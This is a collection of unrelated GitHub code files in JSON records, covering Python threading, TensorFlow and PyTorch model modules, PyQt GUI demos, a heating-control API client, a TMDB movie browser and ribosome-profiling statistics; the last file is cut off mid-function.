time.sleep(2)\r\n item = random.randint(0,256)\r\n self.items.append(item)\r\n print(\"Producer produced \" + str(item) + \" , appended into \" + str(self.name))\r\n self.event.set()\r\n self.event.clear()\r\n \r\n \r\nif __name__ == '__main__':\r\n t1 = consumer(items, event)\r\n t2 = producer(items, event)\r\n\r\n t1.start()\r\n t2.start()\r\n \r\n t1.join()\r\n t2.join()","repo_name":"TanvirDuggal/Parallel-Programming","sub_path":"2_Threading/8_EventThread.py","file_name":"8_EventThread.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4989918202","text":"import tensorflow as tf\n\nfrom PointCloudManage.upsample_op.ops import recurrent_context_encoding, hierarchical_feature_expansion, conv1d\n\nclass Generator(object):\n def __init__(self, cfg, is_training, name=\"Displacement\"):\n self.cfg = cfg\n self.is_training = is_training\n self.name = name\n self.reuse = tf.AUTO_REUSE\n self.num_point = self.cfg.patch_num_points\n self.up_ratio = self.cfg.up_ratio\n self.up_ratio_real = self.up_ratio + self.cfg.more_up\n self.out_num_point = int(self.num_point*self.up_ratio)\n\n def __call__(self, inputs):\n use_bn = False\n use_ibn = False\n\n with tf.variable_scope(self.name, reuse=self.reuse):\n # inputs = gather_point(inputs, farthest_point_sample(self.num_point, inputs))\n B = inputs.get_shape()[0].value\n N = inputs.get_shape()[1].value\n C = inputs.get_shape()[2].value\n\n point_features = recurrent_context_encoding(inputs, scope=\"recurrent_context_encoding\",\n is_training=self.is_training, bn_decay=None)\n\n coarse, coarse_feat = hierarchical_feature_expansion(point_features, scope=\"hierarchical_feature_expansion\",\n is_training=self.is_training, bn_decay=None)\n\n with tf.variable_scope(self.name + \"/refine\", reuse=self.reuse):\n fine_feat = recurrent_context_encoding(coarse, scope=\"recurrent_context_encoding\",\n is_training=self.is_training, bn_decay=None, knn_list=[4, 8])\n fine_feat = tf.concat([fine_feat, coarse_feat], axis=-1)\n\n fine_feat = conv1d(fine_feat, 128, 1,\n padding='VALID', scope='layer3_prep', is_training=self.is_training, bn=use_bn,\n ibn=use_ibn,\n bn_decay=None)\n\n fine_feat = conv1d(fine_feat, 64, 1,\n padding='VALID', scope='layer4_prep', is_training=self.is_training, bn=use_bn,\n ibn=use_ibn,\n bn_decay=None)\n\n fine = conv1d(fine_feat, 3, 1,\n padding='VALID', scope='layer5_prep', is_training=self.is_training, bn=use_bn,\n ibn=use_ibn,\n bn_decay=None, activation_fn=None)\n\n fine = coarse + fine\n\n self.variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.name)\n\n return coarse, fine\n","repo_name":"LiuXinchen1997/PCVisAPP","sub_path":"PointCloudManage/upsample_op/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73028961973","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport sys\nimport textrank\n\nDEBUG = False # True\n\n## Stage 2:\n## * collect and normalize the key phrases from a parsed document\n##\n## INPUTS: \n## OUTPUT: JSON format `RankedLexeme(text, rank, ids, pos)`\n\nif __name__ == \"__main__\":\n path = sys.argv[1]\n graph, ranks = textrank.text_rank(path)\n\n textrank.render_ranks(graph, ranks)\n\n # output as JSON\n\n for rl in textrank.normalize_key_phrases(path, ranks):\n 
print(textrank.pretty_print(rl._asdict()))\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ceteri_pytextrank/pytextrank-master/stage2.py","file_name":"stage2.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"74560559732","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Time : 2/9/18 2:49 PM\n# Author : Jack Huang\n# Email : jackhuang719668276@163.com\n# File : 01_sigslot.py\n# About : \n# 1. 信号和槽\n# 2. \n# 3. \n\n\nimport sys\nfrom PyQt4 import QtGui, QtCore\n\n\nclass Example(QtGui.QWidget):\n\n def __init__(self):\n super(Example, self).__init__()\n\n self.initUI()\n\n def initUI(self):\n\n # 一个LCD屏\n lcd = QtGui.QLCDNumber(self)\n # 一个水平滑动条\n slider = QtGui.QSlider(QtCore.Qt.Horizontal, self)\n\n # 一个框布局\n vbox = QtGui.QVBoxLayout()\n # 添加上面两个元素到布局中去\n vbox.addWidget(lcd)\n vbox.addWidget(slider)\n\n self.setLayout(vbox)\n # 连接信号和槽\n # connect 方法有4个参数, sender 是发送信号的对象, signal 是发射的信号\n # receiver 是接收信号的对象, 最后, slog 是对信号反应的方法。\n self.connect(slider, QtCore.SIGNAL('valueChanged(int)'), lcd,\n QtCore.SLOT('display(int)'))\n self.setWindowTitle(u'信号 & 槽')\n self.resize(250, 150)\n\n\napp = QtGui.QApplication(sys.argv)\nex = Example()\nex.show()\nsys.exit(app.exec_())","repo_name":"HuangJiaLian/LearnPyQT4","sub_path":"3_Event_Signal/01_sigslot.py","file_name":"01_sigslot.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6504363820","text":"from collections import Counter\n\n\ndef get_probs(occurrences):\n \"\"\"\n Computes conditional probabilities based on frequency of co-occurrences\n\n Parameters\n ----------\n occurrences: occurences[x][y] number of times with (X=x and Y=y)\n\n Returns\n -------\n probs : probs[x][y] = Pr(Y=y | X=x)\n reverse_probs : reverse_probs[y][x] = Pr(X=x | Y=y)\n \"\"\"\n probs = {}\n reverse_probs = {}\n y_occ = Counter()\n for x, ys in occurrences.items():\n total = sum(ys.values())\n probs[x] = {}\n for y, occ in ys.items():\n probs[x][y] = occ / total\n y_occ[y] += occ\n for x, ys in occurrences.items():\n for y, occ in ys.items():\n reverse_probs.setdefault(y, {})[x] = occ / y_occ[y]\n\n return probs, reverse_probs\n\n\ndef reverse_probs(probs):\n \"\"\"\n Reverses the conditional probability assuming that variables are uniformly distributed\n\n Parameters\n ----------\n probs : probs[x][y] = Pr(Y=y | X=x)\n\n Returns\n -------\n reverse : reverse[y][x] = Pr(X=x | Y=y) assuming X is uniform\n \"\"\"\n reverse = {}\n for x, probs_x in probs.items():\n for y, p in probs_x.items():\n reverse.setdefault(y, {})[x] = p\n for y, probs_y in reverse.items():\n norm = sum(probs_y.values())\n for x, p in probs_y.items():\n probs_y[x] = p / norm\n return reverse\n","repo_name":"paperswithcode/axcell","sub_path":"axcell/models/linking/probs.py","file_name":"probs.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":365,"dataset":"github-code","pt":"21"} +{"seq_id":"23673923837","text":"def ficha(nome,gols):\n print(f\"O nome do jogadoe é : {nome}\")\n print(f\"{nome} fez o total de {gols} gols:\") \n\n\nnome_a = str(input(\"Digite o nome do jogador :\"))\ngols_a = int(input(\"Digite a quantidade de gols :\"))\n\n\nficha(nome_a,gols_a)\n","repo_name":"ttgomes/Blueedtech","sub_path":"exercicio 5 aula 7.py","file_name":"exercicio 5 aula 
7.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32776819096","text":"\"\"\"Provides handling of a control system.\"\"\"\nimport json\nimport logging\n\nimport requests\n\nfrom .hotwater import HotWater\nfrom .zone import Zone\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass ControlSystem(\n object\n): # pylint: disable=useless-object-inheritance, too-many-instance-attributes\n \"\"\"Provides handling of a control system.\"\"\"\n\n def __init__(self, client, location, gateway, data=None):\n \"\"\"Initialise the class.\"\"\"\n self.client = client\n self.location = location\n self.gateway = gateway\n\n self._zones = []\n self.zones = {}\n self.zones_by_id = {}\n self.hotwater = None\n self.systemId = None # pylint: disable=invalid-name\n\n if data is not None:\n local_data = dict(data)\n del local_data[\"zones\"]\n self.__dict__.update(local_data)\n\n for z_data in data[\"zones\"]:\n zone = Zone(client, z_data)\n self._zones.append(zone)\n self.zones[zone.name] = zone\n self.zones_by_id[zone.zoneId] = zone\n\n if \"dhw\" in data:\n self.hotwater = HotWater(client, data[\"dhw\"])\n\n def _set_status(self, mode, until=None):\n # pylint: disable=protected-access\n headers = dict(self.client._headers())\n headers[\"Content-Type\"] = \"application/json\"\n\n if until is None:\n data = {\"SystemMode\": mode, \"TimeUntil\": None, \"Permanent\": True}\n else:\n data = {\n \"SystemMode\": mode,\n \"TimeUntil\": until.strftime(\"%Y-%m-%dT%H:%M:%SZ\"),\n \"Permanent\": False,\n }\n\n response = requests.put(\n \"https://tccna.honeywell.com/WebAPI/emea/api/v1\"\n \"/temperatureControlSystem/%s/mode\" % self.systemId,\n data=json.dumps(data),\n headers=headers,\n timeout=self.location.timeout,\n )\n response.raise_for_status()\n\n def set_status(self, mode, until=None):\n \"\"\"Set the system to a mode, either indefinitely, or for a set time.\"\"\"\n self._set_status(mode, until)\n\n def set_status_normal(self):\n \"\"\"Set the system into normal mode.\"\"\"\n self._set_status(\"Auto\")\n\n def set_status_reset(self):\n \"\"\"Reset the system into normal mode.\n\n This will also set all the zones to FollowSchedule mode.\n \"\"\"\n self._set_status(\"AutoWithReset\")\n\n def set_status_custom(self, until=None):\n \"\"\"Set the system into custom mode.\"\"\"\n self._set_status(\"Custom\", until)\n\n def set_status_eco(self, until=None):\n \"\"\"Set the system into eco mode.\"\"\"\n self._set_status(\"AutoWithEco\", until)\n\n def set_status_away(self, until=None):\n \"\"\"Set the system into away mode.\"\"\"\n self._set_status(\"Away\", until)\n\n def set_status_dayoff(self, until=None):\n \"\"\"Set the system into dayoff mode.\"\"\"\n self._set_status(\"DayOff\", until)\n\n def set_status_heatingoff(self, until=None):\n \"\"\"Set the system into heating off mode.\"\"\"\n self._set_status(\"HeatingOff\", until)\n\n def temperatures(self):\n \"\"\"Return a generator with the details of each zone.\"\"\"\n self.location.status()\n\n if self.hotwater:\n # pylint: disable=no-member\n yield {\n \"thermostat\": \"DOMESTIC_HOT_WATER\",\n \"id\": self.hotwater.dhwId,\n \"name\": \"\",\n \"temp\": self.hotwater.temperatureStatus[\"temperature\"],\n \"setpoint\": \"\",\n }\n\n for zone in self._zones:\n zone_info = {\n \"thermostat\": \"EMEA_ZONE\",\n \"id\": zone.zoneId,\n \"name\": zone.name,\n \"temp\": None,\n \"setpoint\": zone.setpointStatus[\"targetHeatTemperature\"],\n }\n\n if 
zone.temperatureStatus[\"isAvailable\"]:\n zone_info[\"temp\"] = zone.temperatureStatus[\"temperature\"]\n yield zone_info\n\n def zone_schedules_backup(self, filename):\n \"\"\"Backup all zones on control system to the given file.\"\"\"\n _LOGGER.info(\n \"Backing up schedules from ControlSystem: %s (%s)...\",\n self.systemId,\n self.location.name,\n )\n\n schedules = {}\n\n if self.hotwater:\n _LOGGER.info(\"Retrieving DHW schedule: %s...\", self.hotwater.zoneId)\n\n schedule = self.hotwater.schedule()\n schedules[self.hotwater.zoneId] = {\n \"name\": \"Domestic Hot Water\",\n \"schedule\": schedule,\n }\n\n for zone in self._zones:\n zone_id = zone.zoneId\n name = zone.name\n\n _LOGGER.info(\"Retrieving Zone schedule: %s - %s\", zone_id, name)\n\n schedule = zone.schedule()\n schedules[zone_id] = {\"name\": name, \"schedule\": schedule}\n\n schedule_db = json.dumps(schedules, indent=4)\n\n _LOGGER.info(\"Writing to backup file: %s...\", filename)\n with open(filename, \"w\") as file_output:\n file_output.write(schedule_db)\n\n _LOGGER.info(\"Backup completed.\")\n\n def zone_schedules_restore(self, filename):\n \"\"\"Restore all zones on control system from the given file.\"\"\"\n _LOGGER.info(\n \"Restoring schedules to ControlSystem %s (%s)...\",\n self.systemId,\n self.location,\n )\n\n _LOGGER.info(\"Reading from backup file: %s...\", filename)\n with open(filename, \"r\") as file_input:\n schedule_db = file_input.read()\n schedules = json.loads(schedule_db)\n\n for zone_id, zone_schedule in schedules.items():\n name = zone_schedule[\"name\"]\n zone_info = zone_schedule[\"schedule\"]\n\n _LOGGER.info(\"Restoring schedule for: %s - %s...\", zone_id, name)\n\n if self.hotwater and self.hotwater.zoneId == zone_id:\n self.hotwater.set_schedule(json.dumps(zone_info))\n else:\n self.zones_by_id[zone_id].set_schedule(json.dumps(zone_info))\n\n _LOGGER.info(\"Restore completed.\")\n","repo_name":"watchforstock/evohome-client","sub_path":"evohomeclient2/controlsystem.py","file_name":"controlsystem.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"21"} +{"seq_id":"41886504096","text":"from .extractor import extract_forms\nfrom .models import Adverb, FormAnalysis\nfrom .regexes import remove_html_tags, ADV_HEADWORD\n\n\ndef create_adverb(s):\n match = ADV_HEADWORD.match(s)\n if match:\n headword = remove_html_tags(match.group(1))\n definition = remove_html_tags(match.group(2))\n post_definition = s[match.end(2) + 2:].lstrip()\n\n # Special case when no definition is given, but only forms/loci\n if not definition:\n post_definition = s[match.end(1) + 2:].lstrip()\n definition = ''\n if not post_definition and definition[0].islower():\n post_definition = definition\n definition = ''\n\n adverb = Adverb(headword, definition)\n fa = FormAnalysis(adverb)\n fa.set_forms(extract_forms(post_definition))\n adverb.add_form_analysis(fa)\n return adverb\n else:\n raise ValueError('This is not an Adverb')\n","repo_name":"UUDigitalHumanitieslab/wurzburg-glosses-extraction","sub_path":"extractor/advextractor.py","file_name":"advextractor.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39733484675","text":"\"\"\"add answer text\n\nRevision ID: f8a6a6d9865f\nRevises: 3adad33e0907\nCreate Date: 2022-10-04 19:26:15.308292\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by 
Alembic.\nrevision = 'f8a6a6d9865f'\ndown_revision = '3adad33e0907'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('answer', sa.Column('answer', sa.String(), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('answer', 'answer')\n # ### end Alembic commands ###\n","repo_name":"mirea-ninja/online-quest-backend","sub_path":"alembic/versions/f8a6a6d9865f_add_answer_text.py","file_name":"f8a6a6d9865f_add_answer_text.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10407050964","text":"def pair_sum(arr,k):\n if len(arr)<2:\n print('Array is too small')\n return\n seen=set()\n output=set()\n\n for num in arr:\n target=k-num\n if target not in seen:\n seen.add(num)\n else:\n output.add((min(num,target),max(num,target)))\n\n for a,b in output:\n print(a,b)\n\npair_sum([1,2,3,4,2,2],4)","repo_name":"urguru/python-algorithms-py","sub_path":"pair_sum.py","file_name":"pair_sum.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12263481831","text":"import torch\nimport torch.nn as nn\nfrom typing import Tuple\nfrom .activation import Swish, GLU\nfrom .modules import Transpose\n\nclass DepthwiseConv1d(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n kernel_size: int,\n stride: int = 1,\n padding: int = 0,\n bias: bool = False,\n )->None:\n super(DepthwiseConv1d, self).__init__()\n assert out_channels % in_channels == 0, \"out_channels should be constant multiple of in_channels\"\n self.conv = nn.Conv1d(\n in_channels = in_channels,\n out_channels = out_channels,\n kernel_size = kernel_size,\n groups = in_channels,\n stride = stride,\n padding = padding,\n bias = bias\n )\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n return self.conv(inputs)\n \nclass PointwiseConv1d(nn.Module):\n def __init__(self,\n in_channels:int,\n out_channels:int,\n stride:int=1,\n padding: int=0,\n bias: bool = True)->None:\n super(PointwiseConv1d, self).__init__()\n self.conv=nn.Conv1d(\n in_channels = in_channels,\n out_channels = out_channels,\n kernel_size = 1,\n stride = stride,\n padding = padding,\n bias = bias\n )\n \n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n return self.conv(inputs)\n \n\nclass ConformerConvModule(nn.Module):\n def __init__(self,\n in_channels: int,\n kernel_size: int = 31,\n expansion_factor: int = 2,\n dropout_p: float = 0.1)->None:\n super(ConformerConvModule, self).__init__()\n assert (kernel_size - 1)%2 ==0, \"kernel_size should be a odd number\"\n assert expansion_factor == 2\n\n self.sequential = nn.Sequential(\n nn.LayerNorm(in_channels),\n Transpose(shape=(1, 2)),\n PointwiseConv1d(in_channels, in_channels*expansion_factor, stride=1, padding=0, bias=True),\n GLU(dim=1),\n DepthwiseConv1d(in_channels, in_channels, kernel_size, stride=1, padding = (kernel_size-1)//2),\n nn.BatchNorm1d(in_channels),\n Swish(),\n PointwiseConv1d(in_channels, in_channels, stride=1, padding=0, bias=True),\n nn.Dropout(p=dropout_p),\n )\n\n def forward(self,inputs:torch.Tensor) -> torch.Tensor:\n return self.sequential(inputs).transpose(1,2)\n\n\n 
\n","repo_name":"Plutoisme/PytorchStudy","sub_path":"conformer/convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"24030405239","text":"import tmdbsimple as tmdb\nfrom dotenv import load_dotenv\nfrom PySide6.QtCore import QAbstractListModel, QSortFilterProxyModel, Qt, QModelIndex, QObject, QRunnable, \\\n QThreadPool, Signal, QUrl, Slot, Property\nimport os, shutil, time\nfrom os.path import expanduser\nfrom datetime import datetime\nfrom Utilities.downloader import download_image\n\nUSER_HOME = expanduser(\"~\")\nCACHE_FOLDER = os.path.join(USER_HOME, \"TMDB_CACHE\")\n\n# get absolute path (\"~to .env\nENV_PATH = os.path.dirname(__file__).replace(\"Modules\", \".env\")\n\n# load .env to os env\nload_dotenv(ENV_PATH)\n\n# configure our API_KEY\ntmdb.API_KEY = os.getenv(\"TMDB_API_KEY\")\n\n\nclass MovieList(QAbstractListModel):\n DataRole = Qt.UserRole\n movie_list_changed = Signal()\n download_progress_changed = Signal()\n\n def __init__(self):\n super(MovieList, self).__init__()\n\n self.pool = QThreadPool()\n self.pool.setMaxThreadCount(1)\n self.movie_list_worker = MovieListWorker()\n\n self._items = []\n self._fetch()\n\n def _fetch(self):\n self._reset()\n\n self.movie_list_worker = MovieListWorker()\n\n self.movie_list_worker.is_working = True\n self.download_progress_changed.emit()\n\n self.movie_list_worker.signals.download_process_stopped.connect(self._refresh_process_continues)\n self.movie_list_worker.signals.movie_data_downloaded.connect(self._insert_movie)\n self.movie_list_worker.signals.download_process_finished.connect(self._download_process_finished)\n self.pool.start(self.movie_list_worker)\n\n def _download_process_finished(self):\n self.download_progress_changed.emit()\n\n def _reset(self):\n self.beginResetModel()\n self._items.clear()\n self.movie_list_changed.emit()\n self.endResetModel()\n\n @Slot()\n def refresh_list(self):\n if self.movie_list_worker.is_working:\n self.movie_list_worker.stop()\n else:\n self._refresh_process_continues()\n\n def _refresh_process_continues(self):\n # delete cache folder\n if os.path.exists(CACHE_FOLDER):\n shutil.rmtree(CACHE_FOLDER, ignore_errors=True)\n\n self._reset()\n self._fetch()\n\n def _insert_movie(self, movie_data):\n self.beginInsertRows(QModelIndex(), self.rowCount(), self.rowCount())\n self._items.append(self._serializer(movie_data))\n self.movie_list_changed.emit()\n self.endInsertRows()\n\n def _serializer(self, movie_data):\n def get_formatted_date():\n datetime_obj = datetime.strptime(movie_data.get(\"release_date\"), \"%Y-%m-%d\")\n return datetime_obj.strftime(\"%Y %b. 
%d\")\n\n return {\n \"id\": movie_data[\"id\"],\n \"poster\": QUrl().fromLocalFile(movie_data[\"local_poster\"]),\n \"title\": movie_data[\"title\"],\n \"date\": get_formatted_date(),\n \"sort_date\": datetime.strptime(movie_data.get(\"release_date\"), \"%Y-%m-%d\"),\n \"rating\": int(movie_data[\"vote_average\"] * 10),\n \"overview\": movie_data[\"overview\"]\n }\n\n def rowCount(self, parent=QModelIndex):\n return len(self._items)\n\n def data(self, index, role=Qt.DisplayRole):\n row = index.row()\n if role == MovieList.DataRole:\n return self._items[row]\n\n def roleNames(self):\n return {\n MovieList.DataRole: b'movie_item'\n }\n\n def _get_is_downloading(self):\n print(f\"_get_is_downloading {self.movie_list_worker.is_working}\")\n return self.movie_list_worker.is_working\n\n def _get_movie_count(self):\n return len(self._items)\n\n is_downloading = Property(bool, _get_is_downloading, notify=download_progress_changed)\n movie_count = Property(int, _get_movie_count, notify=movie_list_changed)\n\n\nclass MovieListProxy(QSortFilterProxyModel):\n sorting_changed = Signal()\n\n def __init__(self):\n super(MovieListProxy, self).__init__()\n self.sort(0, Qt.AscendingOrder)\n\n self._filter = \"\"\n self._sort_mode = \"title\"\n\n self.sorting_changed.emit()\n\n @Slot(str)\n def set_filter(self, movie_name):\n self._filter = movie_name\n self.invalidateFilter()\n\n @Slot(str)\n def set_current_sorting(self, sort_mode):\n # check if sort mode is the same as previously\n if sort_mode == self._sort_mode:\n # check current sortOrder()\n if self.sortOrder() == Qt.AscendingOrder:\n self.sort(0, Qt.DescendingOrder)\n else:\n self.sort(0, Qt.AscendingOrder)\n else:\n self.sort(0, Qt.AscendingOrder)\n\n self._sort_mode = sort_mode\n self.sorting_changed.emit()\n self.invalidate()\n\n def filterAcceptsRow(self, source_row: int, source_parent: QModelIndex) -> bool:\n movie_data = self.sourceModel()._items[source_row]\n\n return self._filter.lower() in movie_data[\"title\"].lower()\n\n def lessThan(self, source_left, source_right) -> bool:\n left_movie = self.sourceModel().data(source_left, Qt.UserRole)\n right_movie = self.sourceModel().data(source_right, Qt.UserRole)\n\n if self._sort_mode == \"date\":\n return left_movie[\"sort_date\"] < right_movie[\"sort_date\"]\n\n return left_movie[self._sort_mode] < right_movie[self._sort_mode]\n\n def _get_current_sorting(self):\n return self._sort_mode\n\n def _get_sort_direction(self):\n if self.sortOrder() == Qt.AscendingOrder:\n return 0\n return 180\n\n current_sorting = Property(str, _get_current_sorting, notify=sorting_changed)\n sort_direction = Property(int, _get_sort_direction, notify=sorting_changed)\n\n\nclass WorkerSignals(QObject):\n download_process_started = Signal()\n download_process_stopped = Signal()\n download_process_finished = Signal()\n movie_data_downloaded = Signal(dict)\n\n def __init__(self):\n super(WorkerSignals, self).__init__()\n\n\nclass MovieListWorker(QRunnable):\n def __init__(self):\n super(MovieListWorker, self).__init__()\n self.signals = WorkerSignals()\n\n self._movies = tmdb.Movies()\n self.is_working = False\n\n def _check_movie(self, movie_data):\n if not movie_data.get(\"poster_path\"):\n return False\n\n if not movie_data.get(\"vote_average\"):\n return False\n\n if not movie_data.get(\"backdrop_path\"):\n return False\n\n if not movie_data.get(\"release_date\"):\n return False\n\n return True\n\n def _cache_data(self):\n if not self.is_working:\n self.signals.download_process_stopped.emit()\n return\n\n 
self.signals.download_process_started.emit()\n\n if not os.path.exists(CACHE_FOLDER):\n os.makedirs(CACHE_FOLDER)\n\n for movie_data in self._movies.popular(page=1)[\"results\"]:\n if not self.is_working:\n print(\"Download process stopped!\")\n self.signals.download_process_stopped.emit()\n break\n\n if not self._check_movie(movie_data):\n continue\n\n local_poster_path = download_image(movie_data[\"poster_path\"], CACHE_FOLDER)\n if not local_poster_path:\n continue\n\n movie_data[\"local_poster\"] = local_poster_path\n\n # time.sleep(0.2)\n self.signals.movie_data_downloaded.emit(movie_data)\n\n print(\"Download finished.\")\n self.is_working = False\n self.signals.download_process_finished.emit()\n\n def stop(self):\n self.is_working = False\n\n def run(self):\n print(\"Download started...\")\n self.is_working = True\n self._cache_data()\n\n\nif __name__ == '__main__':\n MovieList()","repo_name":"robertvari/TMDB_210612","sub_path":"Modules/movie_list.py","file_name":"movie_list.py","file_ext":"py","file_size_in_byte":7755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32957143333","text":"import os\nimport random\n\ndef getRandomReviews(filename_r , filename_w , rev_req ):\n\trev_req = int( rev_req/2)\n\tfeature_file = open( filename_r , \"r\")\n\tf1 = feature_file.readlines() # feature vectors for reviews\n\tnum_lines = 0\n\tall_lines = []\n\tpos_lines = []\n\tneg_lines = []\n\tpos_rev = [] #randomly selected\n\tneg_rev = [] #randomly selected\n\tfor line in f1:\n\t\tnum_lines +=1\n\t\tall_lines.append(line)\n\t\n\tfor i in range(int(num_lines/2)):\n\t\tpos_lines.append(all_lines[i])\n\t\t\n\tfor i in range(int(num_lines/2)):\n\t\tneg_lines.append(all_lines[int(num_lines/2) + i])\n\t\n\trandom.shuffle(pos_lines)\n\trandom.shuffle(neg_lines)\n\n\tmy_rev = open(filename_w, \"a\")\n\tfor i in pos_lines[:rev_req]:\n\t\tmy_rev.write(str(i))\n\t\t\n\tfor i in neg_lines[:rev_req]:\n\t\tmy_rev.write(str(i))\n\t\n\tmy_rev.close()\n\nif __name__ ==\"__main__\":\n\tif os.path.exists(\"data.txt\"):\n\t\tos.remove(\"data.txt\")\n\t#a = open(\"data.txt\" , \"a\")\n\t#a.close()\n\tgetRandomReviews(\"../project1/aclImdb/train/labeledBow.feat\" , \"data.txt\" , 1000 )\n\tgetRandomReviews(\"../project1/aclImdb/test/labeledBow.feat\" , \"data.txt\" , 1000 )\n\t\n","repo_name":"prerna-grg/Btech-Course-assignments","sub_path":"Machine Learning/Sentiment-Classification-master/gen_set.py","file_name":"gen_set.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9652113227","text":"import numpy as np\nimport pandas as pd\n\nfrom scipy.stats import wilcoxon, binomtest, f\nimport statsmodels.formula.api as smf \nimport statsmodels.api as sm\nimport statsmodels.tools.sm_exceptions as sme\n\nfrom scipy.special import digamma,polygamma\nfrom scipy.stats import nbinom\n\nlibmtspec = True\ntry:\n from mtspec import mtspec\nexcept ModuleNotFoundError:\n libmtspec = False\n\n\n\ndef get_2D_matrix (psites):\n \"\"\"converts from 1D array to 2D matrix\"\"\"\n \n mat = np.reshape (psites, (int (len(psites)/3), 3))\n \n return (mat)\n\n\n\ndef get_counts (psites):\n \"\"\"counts number of p-sites in each frame\"\"\"\n\n mat = get_2D_matrix (psites)\n\n return ({\n 'total' : np.sum(mat),\n 'frame0' : np.sum(mat[:,0]),\n 'frame1' : np.sum(mat[:,1]),\n 'frame2' : np.sum(mat[:,2])\n })\n\n\ndef get_taper (psites, time_bandwidth = 3, ntapers = \"default\", nfft 
= \"default\"):\n \"\"\"Performs multitaper analysis (as in ribotaper) with Ftest statistics for 1/3 frequency\n psites: 1D array (ORF length) with P-site counts ncodons\n returns: p-value\n \"\"\"\n\n if sum (psites) == 0:\n return (np.nan)\n\n if nfft == \"default\":\n nfft = int(2 * 2**np.ceil(np.log2(len(psites))))\n\n if ntapers == \"default\":\n ntapers = int(2*time_bandwidth) - 1\n\n # Calculate the spectral estimation.\n spec, freq, jackknife, fstatistics, _ = mtspec(data=np.array(psites), delta = 1, time_bandwidth = time_bandwidth, number_of_tapers=ntapers, nfft=nfft, statistics=True, rshape=0)\n\n m = int(np.round (nfft/3))\n sf = f.sf (fstatistics[m],dfn=2,dfd=(2*ntapers)-2)\n return (sf)\n\n\ndef get_wilcox (mat):\n \"\"\"\n Paired wilcoxon-test for frame0 > mean (frame1, frame2)\n mat: 2D matrix with shape (3, ncodons)\n returns: p-value\n \"\"\"\n\n frame0 = mat[:,0]\n frame12 = np.mean (mat[:,1:3], axis=1)\n\n #wilcox_stat, wilcox_p = wilcoxon(frame0, frame12, alternative=\"greater\") if not np.all (frame0-frame12==0) else (np.nan, np.nan)\n wilcox_stat, wilcox_p = wilcoxon(frame0 - frame12, alternative=\"greater\") if not np.all (frame0-frame12==0) else (np.nan, np.nan)\n return (wilcox_p)\n\n\n\ndef get_binom (mat):\n \"\"\"\n Perform binomial-test for n(frame0 > frame1 and frame0 > frame2). Adding random noise to reduce draw-bias, otherwise on-frame is max on draw\n mat: 2D matrix with shape (3, ncodons)\n returns: p-value\n \"\"\"\n\n\n mat = mat + np.random.uniform(low=0.0, high=0.99, size=mat.shape)\n\n index_max = np.argmax (mat, axis=1)\n binom_p = binomtest (k=np.sum (index_max == 0), n=len(index_max), p=1/3, alternative=\"greater\").pvalue if len (index_max) > 0 else np.nan\n return (binom_p)\n\n\ndef get_theta_md (y, limit=20, eps = np.finfo(float).eps**.25):\n \"\"\"estimates theta for nb GLM - adapted from theta.md (MASS package, R)\"\"\"\n\n y = np.array (y)\n mu = np.mean (y)\n dfr = y.shape[0] - 2\n\n weights = np.ones (len(y))\n n = np.sum(weights) \n t0 = n/np.sum(weights * (y/mu - 1)**2)\n nmax = [np.max ([1,p]) for p in y]\n a = 2 * np.sum(weights * y * np.log(nmax/mu)) - dfr\n\n it = 0\n idel = 1\n while (it + 1 < limit and np.abs(idel) > eps and not np.isnan (t0)):\n it = it+1\n t0 = np.abs(t0)\n tmp = np.log((y + t0)/(mu + t0))\n top = a - 2 * np.sum(weights * (y + t0) * tmp)\n bot = 2 * np.sum(weights * ((y - mu)/(mu + t0) - tmp))\n idel = top/bot\n t0 = t0 - idel\n \n if t0 <= 0 or np.isnan (t0) or np.isinf (t0):\n t0 = 1 # default alpha in statsmodels nb glm\n \n return (t0)\n\n\ndef get_theta_ml (y, limit = 10, eps = np.finfo(float).eps**.25, trace = False): \n \"\"\"estimates theta for nb GLM - adapted from theta.ml (MASS package, R)\"\"\"\n \n def score (n, th, mu, y, w):\n return (sum(w * (digamma(th + y) - digamma(th) + np.log(th) 